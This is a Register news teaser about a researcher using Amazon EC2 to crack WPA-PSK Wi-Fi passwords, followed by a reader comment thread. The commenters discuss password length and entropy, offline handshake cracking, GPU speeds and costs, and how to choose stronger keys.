Researcher cracks Wi-Fi passwords with Amazon cloud A security researcher has tapped Amazon's cloud computing service to crack Wi-Fi passwords in a fraction of the time and for a fraction of the cost of using his own gear. Thomas Roth of Cologne, Germany told Reuters he used custom software running on Amazon's Elastic Compute Cloud service to break into a WPA-PSK protected …
in my opinion. It is well-known that one needs an effective keyspace of 2^80 or more (symmetric ciphers) today.
English prose is about 1 bit of real entropy per character. So if you want to perform
gpg --symmetric NaughtPic.png
you should enter something like "challeging wallabys deserves the utmost compassion of fiberglass inspectors and should never be done while eating lemons" for the password. I admit that my passwords are quite often three-word phrases. Please DO NOT use phrases out of books. The spooks do have access to lots of books in digitized form. Religious books are especially unfit for this purpose.
"Not worth a story in my opinion. It is well-known that one needs an effective keyspace of 2^80 or more (symmetric ciphers) today."
Among those in the know yes. But wider education is required.
The useful angle in this story is that it puts an easily understood metric on security: lucre.
Try giving your average Joe a simple explanation of how weak his wifi security is. Go on, try it. Not easy, is it? Then tell him that it costs less than a fiver to crack. That's a very powerful demonstration, and should get him to listen to your description of how to generate a good key.
This post has been deleted by its author
well that answers my question about "why dosent the router tell the intruder to F off after ,say, 3 tries?",
Isnt it a huge hole to be able to take the encrypted password away? why is that necassary? why dont they just handshake in plain "english" , and then the guest takes a guess at the password and the router says yay or nay NOT "heres the answer , take that away with you to crack"
What he's almost certainly done is recorded someone else having that very conversation with the router (not "plain english", but you get the point).
The inherent insecurity in all wireless tech is that you don't have point-to-point communication - if you say "hello", everyone who can pick up wireless transmissions can hear you. Breaking WPA just requires someone to listen for long enough to hear someone else run through the secure handshake and then take however long they want to breakdown and reverse the process offline.
It's like the door to a secret club; if you hear the pass-phrase clearly enough, you'll be able to con your way in.
As someone else said, though, if we're talking about home networks, I'm personally not bothered. Especially since I managed to connect to one of my neighbours' routers yesterday, which still has the default "admin"/"password" login.
I'd tell them, but they haven't been daft enough to use an SSID of their address (well, it's slightly worse since they haven't changed it at all), and there were no nodes connected at the time.
The real story is the availability to the citizen that was once was restricted to governements, computing power that can break 'approved' encryption. As always it is the end to end authentication and encryption that matters. More (better) coverage can be found here: http://www.technewsworld.com/story/Hacker-Shows-How-Cloud-Could-Wash-Out-Wireless-Security-71629.html
Just use good, long passwords and you're safe from this guy. A ten-character, random, mixed case alpha-numeric password will average 30000 years at 400000 per second. Realistically, passwords are often not random. Assuming four bits of entropy per character the time to brute-force a ten-character password comes down to a fortnight. If the 400000 figure is per node then it's a matter of how many nodes you buy and finding a ten-character password in less than a day is conceivable.
So, specify a sixteen-character password minimum to be safe. It's not like you have to type these in every day: they're typically entered into each computer once and saved. At that length it's getting hard to find dictionary words though I guess you'll still have idiots who manage to find a totally obvious pattern.
"It's not like you have to type these in every day"
I used the little button on my router the other day and didn't even have to type in the password. Granted, I've only used it once but if that is really compatible with a variety of devices one could max out the password field with completely incoherent and random gibberish and never even look at it again.
Maybe?
Remember that while this guy does it using EC2, Elcomsoft have already got the speed to 100k checks a second using GPU (HD5970 gets 103,000).
This means that a Sky Router supplied to Joe & Jane Bloggs with it's 8-char (all UPPER) PSK will be at most 23 1/2 days to crack. It's a long time but 50% chance it'll be done in half this time so on average you'll get it in well under a fortnight!
These GFX cards are expensive now but will soon be commonplace, and once they're in all machines then the 5 machines I have in my house could get the password on average in just over 2 days!
So, while the cryptography isn't broken - the common implementation by major ISPs is....... wonder what the RIAA and MPAA will say?
>>"So, while the cryptography isn't broken - the common implementation by major ISPs is....... wonder what the RIAA and MPAA will say?"
Possibly they might find it appealing to say (in conjunction with the police) something like:
"You *appear* to have been illegally sharing copyright content. If your defence is an allegation that a computer crime has been committed and someone has been accessing your network without authorisation, as part of the investigation into that allegation, we require access to all your computers to check out your claim"
Personally, I suspect that they'd *love* someone to try the 'hacked wireless" excuse and then get done for falsely reporting a crime.
And as for the paranoid folks round here, having easy-to-break security on your network could rather leave you open to malicious individuals (or malicious agents of the state) downloading/uploading the kind of stuff that really *will* get the cops hammering on your door and poring over your hard drives.
If you actually have anything on your computer that you really don't want Big Brother to see, you probably want to make sure your wireless security is as good as it can be, or don't use wireless at all.
It's a chicken and egg problem. If you need to access a "cloud" service, like Amazon's, you need an Internet connection. And if you're trying to crack WPA encryption using said service, how are you to get online to do that? And if you already have a connection to the Internet then what is the point of cracking the WPA encryption? Perhaps in rare cases, someone trying to access an enterprise network could maliciously do this using a secondary connection to the Internet, but that's what RADIUS and WPA2-Enterprise with AES are for.
You need to let your imagination run a little. People often mistakenly assume their home network is safe, as long as they use WPA2 (that's for sophisticated users, who have actually heard of WPA2). Hence, resources like home computers, home network storage, etc. are often perilously unsecure.
If someone wanted to plant something illegal onto your computer, or pilfer your documents, license keys, compromising private pictures or other valuable data, there would often be very little to stop them once they compromised your WiFi security. And the best thing - you would never know!
Never underestimate malice, jealousy or just plain envy when it comes to motivation.
Since you lack imagination:
Clod A gets himself a dial-up account for a month. He lives near Clod B who bought himself the spiffiest, fastest fiber connection available, and because he's the sort of Clod who is more interested in showing off his shiny new toys than understanding them, has his computers connected to them using WPA2 cause he heard that's the thing to use from a friend. Clod A collects his data sample and uploads it to the cloud to crack. Maybe he has to spend two whole months of dial-up connect time to use the Amazon cloud to break the encryption. But when he's done, he can now tap Clod B's super high speed connection for free and can cancel his dial-up service.
Your argument seems flawed, dear Watson.
Amazon rents its cloud oomph to clients independent of what they want to use it for. Sure, there may be some official policies against illegal stuff, but unless someone takes some serious time and effort to debug every single program executed on the cloud, there is no way for Amazon to know just what is their fluffy stuff is being used for.
I reckon that Amazon might publish a policy update sometime soon.
Amazon is not a protected internet service provider that provides service to end-users.
ISPs like comcast, rr, time warner, att, all are exempt from things like this since it happens at the clients residence.
These actions however occur at Amazon facilities. Don't look for amazon to be held liable for it however.
Amazon owes alot in taxes to various states but was recently told "don't worry about it" after they rm'd wikileaks.
If someone comes to our company to lease a dedicated server and something like this occurs we are liable for it. Us going after the client is our responsibility. We aren't providing end-user service and neither is amazon.
Unlike an end-user ISP amazons own employees could be doing it. You could never prove otherwise.
you can only crack something when you know the clear text. In WWII they knew some of the clear text e.g. Heil Hitler or the weather report. You can crack encryption on wireless by sending the guy an email and watch the encrypted version as he reads it. Since you already know the clear text you can brute force the key.
To crack the wikileaks insurance file you'd need to know what was in it. They boffins at Bletchly were german linguistics experts so looked for word patterns (or cribs) i.e. they guessed parts of the plaintext and just cranked the handle until they saw the words. You'd have to do the same for the wikileaks insurance file and sice no-one knows what it is about it'd take a long time if all you had to go with was a guess of "US" as a single word.
Most computer-readable file formats have a sequence of ID bytes near the start of the file that the associated application uses to verify that the file is of the correct type. You just get a list of the ID strings used by all the likely file formats and use these as your cribs.
For plain ascii text just check for a long sequence of bytes which have the highest order bit set to zero, or check against a dictionary.
You can rely on entropy reduction in the out put of your decryption to be informative as well. The cracking of the Enigma code resulted from knowing the coding mechanisms (it was after all patented) and knowing what letter combinations occur with which frequency in the plain text (assuming it was German). Knowing actual words is a great boon, but not strictly necessary.
If you really need provably uncrackable security on a document: use a properly randomized one-time-pad, i.e. an unguessable password of the same length as the plain text, and doing e.g. a bit-wise XOR. You cannot brute force this, because you need to generate all character sequences of the same length as the document, which leaves you to select which of the 27^N (assuming no caps, digits, or punctuation, with N the number of characters) outputs is the correct one. Apart from all nonsensical N character texts, only one of the sensible N character texts is the right one.
use the first word on each line of a random book page. How good is that?
4 bits per character is the size of a hexadecimal code - duh. one bit per character for plain text sounds about right.
What's the maximum key length anyway? Yes, it's stored in Windows and other OS so it usually doesn't need to be re-typed. You can even load it from a USB stick, I think. But you do have to type it a few times.
I am expecting to dispose of a computer shortly that has my network key, so I'll be changing it!
I read an interesting point at my (new) company the other day, as part of their security/password policy: write the password down.
Now yep that sounds TOTALLY WRONG, but their argument was that since most attacks will occur over a network, it's more secure to use a very long password written down, than a shorter one remembered.
I've yet to see any remote attack that can open the top drawer of my desk and read a post-it note.
"I've yet to see any remote attack that can open the top drawer of my desk and read a post-it note."
I've just seen the future and it has small, semi-autonomous, camera-equipped flying lockpicks in it.
Fortunately, just after I saw that I had an Anadin and a large Scotch and forgot about it all. Good thing for you I didn't write it down anywhere eh? Oh.....damn.....time paradox.........
Here: http://blog.zorinaq.com/?e=42
In the last section is a concrete example showing a typical Amazon EC2 GPU brute forcing task costing 33x more than building and running it on your own GPU machine.
The takeaway is that Amazon EC2 GPU instances are very costly for 'dumb' brute forcing jobs, and relatively slow because they are based on Nvidia Tesla M2050 cards which only offer 1/3rd to 1/4th the performance per Watt and per dollar of high-end AMD/ATI cards.
Using Amazon for any brute forcing job makes no financial sense unless operating at such a small scale that buying a single GPU would be more expensive (which seems to be what Roth is doing by spending only $1.68 on one crack).
That depends entirely on how much you want to crack. Buying even just one radeon hd 5970 at currently $ 532.95 (pricewatchdotcom) is well more expensive than shelling out a fiver or a tenner for an amazon job. Not counting buying the rest of the box and having it accessible where you want it, locally or remotely through say a DSL hookup ($N per month) or a colo ($M per month) plus power and maintenance and such. So if you need more than a little GPU power, get your own. If instead you just need twenty minutes on eight GPU instances, well.
While this was probably done mostly for show, the economics behind it aren't much different from the old "do we buy or rent a super for our research?" or even "do we buy or rent a car to get from here to there and back?" you find elsewhere.
(You mention power, cooling, hardware to support the GPU, but all of this is already taken into account in the "33x" number I mention above, see the link).
I recognize your point. You paraphrased my last sentence: EC2 only makes financial sense when operating at the hobbyist scale, on minuscule brute forcing tasks. I am just afraid this article conveys the wrong idea. Anybody spending more than a couple *dozen hours* on 8 EC2 GPU instances should realize that buying 2-3 GPUs would be faster and a lot less expensive beyond that point.
According to FBI Director LOUIS FREEH at the SENATE JUDICIARY COMMITTEE TERRORISM, TECHNOLOGY & GOVERNMENT INFORMATION SUBCOMMITTEE in 1997 said...
"As my friend in the NSA tells me, to break 120-bit encryption, it would take 26 trillion times the age of the universe to decipher one criminal bit or one message bit in order to respond and take some appropriate action. We can't function that way. "
Appears that the universe ended a bit early,
Or it takes Fort Mead 20 minutes to process the keys, and the rest of the time trying to do the paper work authorising the inter-department recharge for the work.?
The additional cost to brute force a password grows exponentially with increased characters.
Lets assume that there are at least 64 possible choices for each character in a password.
If it takes $1.68 and 28 min to crack a 6 character password a 10 character password will require 64^4 as much time and money. That works out to about $28 Million and 893 years.
Lets make the drastic assumption that cloud computing costs and times are cut in half every 18 months for the next 48 years. You will be able to brute force a 10 character password for $1.68 but its still going to cost $28 million to brute force a 14 character password.
My wi-fi is wide open. Anyone can access it.
Granted I have property out in the country. In order to get close enough to access my wi-fi, it is necessary to trespass on my property. Where I live here in the states, we shoot trespassers. Then we fire up the backhoe and put their permanent dirt-nap 6ft under.
It is no surprise I have never had a problem with someone stealing my Internet access.
I understand that from the 1st of Jan it became a criminal offense to download copyright material so I will use my WISP skills and a high gain antenna to use your Internet from 2 miles away. This will draw letters from Hollywood lawyers which your ISP will then forward to you. If you may well get arrested and put in prison. You will be the first under this new law I expect.
if you encrypt your WiFi and I crack it you won't be able to deny it was you and blame me. At least if it's open there is a possibility that it was not you. I am basing this on a recent letter a customer received from their ISP who had been contacted by Hollywood lawyers for stealing a movie using BitTorrant.
>>"if you encrypt your WiFi and I crack it you won't be able to deny it was you and blame me."
I guess in the first place, that depends on whether it's provable how secure a network was at some time in the past.
Who can contradict a claim it may have been unsecured, or using WEP or a short key, unless they've been staking the network out?
Secondly, at least at the moment, it seems more likely that people would crack passwords for networks they were hoping to use repeatedly.
However, that'd be a pretty dangerous thing to do, since unless the first a network owner knows is a high profile police raid that an unauthorised accesser is likely to see, the network owner may well be aware of unauthorised access long before the unauthorised accesser knows they've been rumbled, leaving the potential open for them being tracked down and given a severe legal kicking.
That would probably only need to happen a few times to make most people think twice.
If someone created a /smart/ three strikes system, with helpful initial warning letters and support for customers who mad a criminal complaint alleging their network was being broken into, it could be an extremely unpleasant place for people trying to get unathorised access.
If someone was making *regular* use of a network, it'd be easy to fairly solidly confirm suspicions of hacking by having an investigator quietly on the premises at the appropriate time (or by having the owner confirmed to be away from home) assuring themselves that the owner wasn't making any wireless connections of their own whilst the hardware was recording wireless connections being made.
63 characters. That's what mine is; plus it's a random stream of characters. Damn, I just reduced the keyspace for your attack.
Sure, it's a 5 minute job to type into boxes (such as games consoles) where you can't use XP's Wireless Network Setup Wizard, or a text file on a USB stick to copy it across, but hey, you get that fuzzy feeling and it saves a thirty foot length of Cat5 running to the router.
And Xbox is WPA only... no WPA2 -- boo to you, Microsoft!
The Register 
Biting the hand that feeds IT
Copyright. All rights reserved © 1998–2025
